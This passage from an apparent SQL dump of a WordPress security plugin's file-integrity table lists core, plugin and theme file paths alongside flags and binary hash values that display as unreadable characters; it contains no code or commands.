�Ǟ>o','wp-admin/images/wordpress-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�%�d���g���p','�\"�u�j-QE\0��[�gL�Z5�MD�:','',0,'?'),('$%#��_�U�_d�','wp-content/plugins/wordfence/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�a2��%x�h�YB','p�����~���&�������W�OX(Û ','',0,'?'),('*�O�������i','wp-includes/customize/class-wp-customize-media-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�lh�¸�j�68��','V]�l��1W�+ {6v��ޣ��C���=��','',0,'?'),('=�NgÈ�����W;','wp-content/plugins/wp-cerber/assets/flags/ci.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�yd���2¹��','���.�=D ��dԢ���)�*k���,8Dˬ','',0,'?'),('D�� �2��K|&�','wp-admin/css/nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g^�C>��uJ�>�\Z','�V.��/�SV��9:_I:aldt�p���aue','',0,'?'),('Q�10�����G��,','wp-includes/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x} ��pc��K�O�','(H>�0�}���8:e�)T��N�/�z�','',0,'?'),('WT�)\0`�@�m�Q�','wp-content/themes/regina-lite/inc/customizer/panels/speak.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9&��$�7*\ZV��Ҋ�','\'$j���h�`�Z��\0��]�����\"z{�祯','',0,'?'),('{�M��i�i2n��6�','wp-includes/js/jquery/ui/effect-highlight.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���x���:��cT�','D�I�4h\ng�SZ����o|�(ޱs\r8�z��','',0,'?'),('�K\Z �}�ȑ�ׄː�','wp-content/plugins/wp-cerber/assets/flags/lb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',6uƤs%��D^P��)�','��!�sl��Q��_~m�I�n��G)���.','',0,'?'),('���<zɓ�����.','wp-content/themes/skt-toothy/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\'aH\\��p!��','�L�6;�3��0Am\0ς!.\Z�!�?�\r��cKe','',0,'?'),('�Ą2F���5*�\0\0@','wp-content/themes/skt-toothy/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]����Vv+�Lp|','Y\0c?�����ZE�w�7��X^3���%�ƌ�]�','',0,'?'),('�)&�M2�D�\rY�U^','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�����8v��w5ǿ','����Vs��y�f(����G�8�hM����\Z�j��','',0,'?'),('��A��Fk�','wp-admin/js/privacy-tools.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_j]������RW','DŽܜ�6�\\���@���]ؿ��(��9�N c','',0,'?'),('���.Q}3��T�','wp-includes/Requests/Hooker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@%�a[ў/4��','t\r{�k�?i�k�C\nL��b�̇�Wy','',0,'?'),('�Z�u���iigԄ��','wp-includes/js/dist/nux.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꁥ�قH6K�&�x7��','-p� C��5s����5��s\"�^�C�����8','',0,'?'),('\rE�lZ}�I��8�+V','wp-content/plugins/wp-cerber/assets/rateit2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�_��[r]s�T�j','�Uu8�X*O\'bS,���+�|tV֭�( S�','',0,'?'),('\rP�\r.B���$��Nx�H','wp-content/themes/weblog/acmethemes/hooks/comment-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��IQ��Ϭ�b�\\#','�)��`4?K8�&J�>`����r}�A(�]Cd','',0,'?'),('\rU�j�zh�2/�9�fM','wp-admin/js/application-passwords.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iߞ=�%\\�����p�L4','\'й�1��]��uYїv�l�0���H�\\����','',0,'?'),('\rj�y��럇״��G�1','wp-content/themes/healthcare/lang/en_IN.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J02<S�a�J��','�H(>��\r���e�2�ˈ8��y�l�`��¦�','',0,'?'),('\rxݍ�^���\Z���<;','wp-admin/my-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/v� h7�@A�h','P[ĝ�C1��֡?qt�����C�����w#','',0,'?'),('\rz�����D�D��','wp-content/plugins/wordfence/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SDRU���7}�','�n:kɆZ���/��|L���S����n�D.N','',0,'?'),('\r����X����+�-Ta','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ �Mϼ�V_�i� ��','��U�s����D�MÙ�d��(�\0��ā�~���','',0,'?'),('\r�vN��[B��&��SL','wp-admin/css/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M嬬�S�Ի�JP��','��H����焑;���#�O����/t��','',0,'?'),('\r��<�:� -{��̖H','wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3°�\nᄷ�\0�a��','` \\XO�U>8X.�f��?��m�{\nQ]�8��','',0,'?'),('\r�d���uQ�n�k','wp-content/themes/twentynineteen/sass/media/_media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<2Q�.�%�|=�S�','$�?2���sȉ�F�G?TC?EkB��f� ��S�','',0,'?'),('\r�ҧxOz��z���h','wp-includes/class-wp-customize-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�Vj�\'WB{.��u','�f)%�|u��8Jo�A�tD4�L�+����^','',0,'?'),('\r��:�:���HH�:d','wp-admin/css/edit.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�=Z��-�!?q#3�','�J墥��O������b�*�:e�š�P�','',0,'?'),('\r��:���\Z�(����','wp-content/themes/wp-barrister/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^=�T��_�<��S�','���߸�/�x��j��GA\Z�\Za�0�^�t��h','',0,'?'),('\r�%����%�yS�`�','wp-includes/js/crop/cropper.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H.s�o����','�py����,B�����G��-�t�����=�s','',0,'?'),('\r͘���1�\"v).�s','wp-content/themes/regina-lite/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�N�{�cX��j��','�?#?�G\n���0 �W)�HI�ﴋ\'�㎁��','',0,'?'),('\rѪ1s1=��`(�y','wp-admin/options-head.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cV8A#h:e/��^','c҈��^$kR2\r=���ܫ���@g��2�','',0,'?'),('\rҗ�r� ���\n�\Z','wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�@���ޯ]��&','7aP��\\T����\"S�z���J�&b�ٸ®D�','',0,'?'),('\0�[|��}��袄D�','wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jV�@K����7�','����7y�^-��\'���<^?b�L���i=x�','',0,'?'),('�{����9�I�','wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css-colors.php',0,'N��ڮ9 %�{�\"�','N��ڮ9 %�{�\"�','�ڲ�����}ekA�����9_tu0{_.��','',0,'?'),(' \"��;�]<H��','wp-content/themes/doctors/core/customizer/help/_text_color_meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nz&��>\n?���','z��7�t��V\n�p���HXM(�6.� &.d','',0,'?'),('W7��{(��;:P���?','wp-admin/includes/class-bulk-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A2�?������+Y��','�i���;�M3�U�P�<�XZ��z����','',0,'?'),('X��H奥(�:�Z�','wp-admin/admin-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�Iys��j�y��Ѩ_','8=Ի�(���H��&�uE\Zl}RZ��>Ol�x','',0,'?'),('\\d���;�ѳbI%@��','wp-content/plugins/wp-cerber/assets/flags/dk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K\n�l����7D!','%���w����r6�U^�/1���6�a��\'<b�B','',0,'?'),('^��� �lkB��K�','wp-content/plugins/wp-cerber/assets/flags/vg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����C�XBJ��\'2','`���G�a\02��%̛7�\\H�=gs�%��','',0,'?'),('a5�ͅB�_��s�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('go�s�V�;���\n$','wp-includes/js/tinymce/plugins/compat3x/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�n���1����oVb','C���T�(��N+�,��TN�C����`ީ���','',0,'?'),('�Fv �N`{խ�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/js/epsilon-admin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����r��Mrdxvx','&�G�<)]��Z��#�1J_��\";L����,','',0,'?'),('�h�r\Z����;%e�-x','wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('�����U��)��ʀ3G','wp-content/plugins/akismet/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u(Y�kR��S�','�%O�N+�84Nm�[�ւ���/f�wc���)\0p��','',0,'?'),('Ö���vh���l��P','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��ZobS\ng5����','\n�)�^�� ����`-��/��3{):?�','',0,'?'),('� ��C�Y���','wp-includes/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�w3aAr���6VH%�2','%���(\'��Q�[����y�B�� �O4AO7','',0,'?'),('�>�M�8� ٵ��|','wp-includes/images/crystal/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S����I0An�','L��%X����O�+��Aa�!�S�\\܉�&���','',0,'?'),('�ihOP[����f','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B�^.Q�iI�','Cc�qa\0>�I�1����?^����_7�c','',0,'?'),('�Hd�����o�CZ','wp-includes/sitemaps/class-wp-sitemaps-index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&a���1��5b}1','�kZ���`��*5Yu�
�WB�-4Y?�{̯�','',0,'?'),('�?ߦ�aL~*\n','wp-content/themes/healthcare/inc/customizer-page-editor/js/one-lite-text-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܳy���>����_','�xhQ� 5T��k����%1�_���Y��','',0,'?'),('��\"\rJ\04��\'i�','wp-admin/js/password-strength-meter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʃ�D����)�a�n','`��)C�E�L�d�X\\�&F-�V7�+1�SA','',0,'?'),('݆�]�1��7w��','wp-content/themes/doctors/core/contents/part_subHeader/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^n�L�K�{6�=�~�x�','V6�o�{�d�������`�S/�U3','',0,'?'),('�C���C*�v�\0�_\0','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1ɪ�[�v����Y�','m5oA��K<�f�X]�zu,# ��3�s�ߵ','',0,'?'),('4�}T�k�D\'W','wp-content/plugins/wp-cerber/assets/rateit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)3U�d�/��{\ZK3E�','�,-3�\"�a��~����P�c���8�F��M','',0,'?'),('7kq������g>((','wp-content/themes/twentytwentyone/assets/css/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/%�5P�,`[�@6','�WEٺǎδU���mU�V��\r��O���z��','',0,'?'),(';\'�`^Ɗa���','wp-content/themes/doctors/core/home/blocks/blog_grid/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����[�u�e\0���','�7*\n4�����Ƌ0M%g����5��G<�K','',0,'?'),('Vn�`�G�}>a\\','wp-includes/block-patterns/text-two-columns-with-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���N o�F\0�A\n','cUȫd4�B�nD����Q��n+R��J1e','',0,'?'),('\\�����AV*籿','wp-includes/js/jquery/ui/slider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ҏ��9�4g��','/\0�ȷ�s�d�Z�Ʈ�6����[�-\ZM ?u','',0,'?'),('e������~Ь9�','wp-content/themes/twentytwenty/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�4�a{|��r�K)l','p3\\Ll#J��Cv�\n6j�n���Նs�i�_�','',0,'?'),('�c��nx�Ժ|�','wp-includes/class-walker-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��2�G�E����;H�','GJ8������Y<1Q{<�5�C���[�V��z','',0,'?'),('��%�If�Q�9�;P','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dashicons-control.php',0,'��x�[�G�`�9','��x�[�G�`�9','�AT萶�G1�NbqY:֏|jt�|_�ܤx','',0,'?'),('�M��7��\'�~h\0~�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/sections/recommended-actions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�\0X��]I6���B','��#~����-L\n��~[�vh{>d2�cc','',0,'?'),('�U�cO���d⻧W��','wp-content/plugins/redirection/locale/redirection-it_IT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��LR[]�@h�+i�','v]ˏV�~!�b�����f�<*\Z[S.W�6','',0,'?'),('�%�p��Bf�B�#��','wp-content/themes/healthcare/css/custom.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�SQeぼ�125��K�','t$ʡ�NZ����rz��V�O9��9�','',0,'?'),('��Drl�wNB�0�R�I','wp-content/themes/doctors/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{����75��]J��%','T�E�9��vQ�UJe��=�^ �����Xi','',0,'?'),('�����n��Nd','wp-includes/js/hoverintent-js.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' p��.`�u76��?','Y!�:\nA��ː ��ګ�Zg�,=�|����','',0,'?'),('�]�*�.>`E��f�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�F���h�瀁1-�','6!o�m��ݎ^�.�^@˨��v7� I�}��','',0,'?'),('�ݡ=��Nx��K�`*','wp-content/plugins/wordfence/lib/wordfenceClass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��R������\\��','j��� �����=��$W�^�P�i�Z��\"','',0,'?'),('�sc�Ev��O8�','wp-content/themes/twentynineteen/sass/media/_captions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'^�_��_]E�M\'so','�����-L���n�@A��!��@����f��','',0,'?'),('����V*�+�VbJ','wp-content/themes/skt-toothy/images/icon-email.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�M����f�Y̼�','��nG���V>�:�C�4����}2H���h','',0,'?'),('��d��=��@hs�:k}','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#lJP��e0u�g�۔�','U�WM����slL����9#Tb�Wj?\\�u���','',0,'?'),('��r�&|�|.����','wp-content/themes/vision-lite/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ղՁD�j���','��)���P�g�<�W��C1{B��I�P','',0,'?'),('�rJ�<p>����Z�','wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����*J\0���\0�','�7�C�:r�xe��BM�����sx8�d;�+','',0,'?'),('�&/�db�d�q�2/','wp-admin/includes/class-wp-community-events.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��nu�_�hY&\'V[','B{�\r_�أ���M\'��\n~6)���+��᠘','',0,'?'),('�%w45�X��泞','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��^I\'�]!�����','��Ǧ�bt�5��f�����c��kd��m','',0,'?'),('\0��]�a�v���CY','wp-includes/class-wp-walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�+@,�G,��S^�y�','�(8j�C[-��1�Ơ��ʖ��l3Om�','',0,'?'),('L\'d��aȿ��W4','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jF�p;X��m4\'R�','��TX$� ��Ƈ�\Z5P�ż-�6�Bv�K=�*','',0,'?'),('�?H�����h�D0 ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ﬨ�rz���d�','�h���+�][e+�h�ӆ��FY� V','',0,'?'),('���NVԱ��z�Z','wp-includes/js/jquery/ui/effect-shake.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�̎�X�!��-�U��','�.��,�e=~[�Y�p�x�\"��o�?v��#��','',0,'?'),('ǭ���kOl 9ڇ�J','wp-content/themes/twentytwentyone/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uH�+-x���i��k�','�!}�@�,Ж@���9�ڏ+��+{�4�4@7��','',0,'?'),(')��_�J�����','wp-includes/js/media-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wɊ��Ur���c[2','�Q�疁�n�s;�;��Z�<☱4K;~{','',0,'?'),('+�El>�z�#�X','wp-content/themes/advance/inc/kirki/assets/js/controls/color.js',0,'��|�������+u.','��|�������+u.','��-gZ��y�OeO�\0�髚aj�v�\Z��k','',0,'?'),('Fnʹ=8�_�?�F�','wp-content/plugins/wp-cerber/assets/flags/lt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z���\0��H�b�','�l�w��L+�u�Ţ�U��J&�������','',0,'?'),('G<7e�t�/�W�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[f0L�ş��\r�{VW�','��\'&ܔ[m`�ϊ�c2E��%�W�GW�䉷','',0,'?'),('L}b&�۵�b','wp-includes/blocks/separator/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��Tz�g�\'U�c','�����굗�Ij��2%]��\\&q��Jw\\�','',0,'?'),('Wd�l��\09?��i���','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��-���5��_a�_','!Pz4Y-C�i�Yk��-\0���nb:���a�[','',0,'?'),('YA��Tk�����','wp-content/themes/skt-toothy/images/icon-tw.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y鰣^��\\��\n\\>','\n��n7�-�]�-N��r�wP\'߹�Α��|�','',0,'?'),('`�&��锥~K3/d','wp-admin/css/login.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�\"b\"�%X=&���','�2��U+҆�5�~�=�=FL�A�ʯ�,S��','',0,'?'),('�\'ѯ�H��o3kVX','wp-content/plugins/wp-cerber/assets/flags/to.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��Un��ze��','^�7��\r)���KFd��FG6B�����(\0_*','',0,'?'),('���ґ-���\r�{,�','wp-content/plugins/wordfence/lib/wfCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 ƿ����s�y��','|�uIP�wh5ڎ.m\"*n_�� 9����J�P�','',0,'?'),('�~��L��*�,�<:�','wp-admin/includes/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lp�Bd����Z�','�O� �n�uO\nd�7K[\"}��7\'p���`��`','',0,'?'),('�Sx��4�@o�w�N','wp-admin/js/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`k<,��j3�eE4��','��m����N��Dڽ��a�\r��q���1�i�[+','',0,'?'),('���:m��[ݢ�:#','wp-includes/l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(��C�h���#','�Ǹ�9�1Y�����5$�?,=�M�2.��r�','',0,'?'),('�I��\\j���x���g','wp-admin/images/date-button-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?���a�0��9JQ\Z�','���*�Q����_(G:*��ηd������.','',0,'?'),('ԏ*�su �c$��','wp-content/themes/healing-touch/no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q �(��<�ZͻȪ','E۷���\ZXk�*�j:H*�a��g����','',0,'?'),('�]P�JQƀ6o֢��;','wp-includes/Requests/Exception/HTTP/428.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�B��}�^�t*','C�O�W%���tߏ�Y�|��&�0�V�\\�','',0,'?'),('�P�t�hN� 4����','wp-content/themes/doctors/core/contents/loop_single/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�ʄ��-=G�\Z�{�','u�K�ը��,ɋ�d��^O��X\\ٕX��i','',0,'?'),('���j7r[�,��Z��','wp-admin/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�,/����L�;�','��kNIM\0���ڿX\Z��S��ŁԾ��W�','',0,'?'),('������a�ͺ�ʥ�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/sections/section-doubled/section-dobuled.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݢ� �`\\���:�T','t��c��M���{ՙ%�秨�/�y>n<t�u�','',0,'?'),('4��B�\07qoB�o6�','wp-includes/blocks/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z<!�U�n��_�eQB','Pn�2���&�Y!�>P�ٙ�{�q61����p','',0,'?'),('\Z��lm��@��','wp-includes/customize/class-wp-customize-date-time-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��ch�L��F�3�b','�!V���#|��:�{Ǎ.a����(�[y�O%','',0,'?'),('�-��\'g���P�\\�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�V�#ҹ���4�','Gp�f��Hv����\Z��x�8����1C�[�4A','',0,'?'),('���}��>�|��I','wp-content/themes/twentynineteen/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����?����/��L��','v��b3샪k\n!{;�]��\\�;~=J�8����','',0,'?'),('D�8hFޛBViR�','wp-admin/css/colors/blue/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�]Nt�f��B}o ]','�q�̿��j�d���eo\n�%�;�����','',0,'?'),('L,\Z\"�\0C�ʡ8y�','wp-includes/js/dist/primitives.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�1��~�i!�EKHK/','�S�R�8P���oa:@c���E~�|�Ji�','',0,'?'),('j���q.�*;��2','wp-admin/css/colors/sunrise/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�#���o\"x��<�','��i�!��\'��j�T+d�Q��B�K�D@h4�G','',0,'?'),('w�es��i<�O�J%�','wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ~��ZJ�yΧ�%���','�hH��M����7�m��\'iB�@�>�','',0,'?'),('�Ը��%\ZD�y�Z','wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�$u�e|)�\'aD�k�','�cA���P/Ɖ���wޝʐ#ۋ�\\�`','',0,'?'),('�Z��d*��Y��ژ�','wp-content/plugins/wordfence/views/options/block-all-options-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5f����Җ�Ph�','�K;��C��l]�?`w9�0����CmĂ�N�','',0,'?'),('�ӎA}ҎWZ5=*t�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b;v\'�g��~����k','m�!�M��J\"v�>,���0�\0՜ɫ� &jِ�','',0,'?'),('�ޫ� Y�z0���','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-group-title.php',0,'�εSs�7�hE���!','�εSs�7�hE���!','��r�s�,�1=e�S{��i� �i�0~��n','',0,'?'),('�*��k�um1=-���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IW B���>ToR��J','8ȼ�?$[�g1N4}��{�Y�K�J�$��C90','',0,'?'),('�r�W�3���V','wp-admin/css/color-picker-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�p�ES���c�V','�<�=\0�[Z\n2|닢��\0?6������������','',0,'?'),(':�X��2�M��~��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�4vLhN�!��2|','���3iA(���p���GD��ڔ����','',0,'?'),('@%�e��ܾY���W','wp-content/themes/wp-barrister/library/images/shadow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3]���.�@\\�','�)>8�Հ�,Ki��X�ܹ��g�2@\0��R�:','',0,'?'),('C�y��8�\'a���','wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0mj���Ԟ�W','�͛=��ېI�hK�g\0��%T.��]��\r��~','',0,'?'),('L���8��\\�ݼ+','wp-admin/images/imgedit-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��\'��6U�������t','�?�؎)�.l�����%�<�(�_� 6�`^c7','',0,'?'),('Y�U��h|kU$��;','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��DZc�ժ�h�Ǘ�','x\n�� �sd��26*�P�ꫡ�f�t��45�bz','',0,'?'),('m�ñ�~���R�?','wp-content/plugins/wordfence/views/tools/options-group-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�!�aJ:e��c�','3|h|��Kqh�{� \r7��kH��\\�~e�l-�','',0,'?'),('p۞�2N<:Z�7�r�','wp-includes/js/tw-sack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������9>���','{�n]�\0ֈ��n�\r����<�w˷X)���:','',0,'?'),('u�)8FG9�C�(���','wp-includes/js/wp-ajax-response.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/pM]�{\"@���s�:l�','�B�HQW�2����a��w��C���- Y��','',0,'?'),('w�i�V\n%\\�\\�6�nd','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/data/icons.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���̊�\"Hx����|�','�d\\W�a%��c=�Fh3�G���j��8��n�','',0,'?'),('�eBU\\k�h�tK_�6*','wp-includes/blocks/subhead/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�L[� 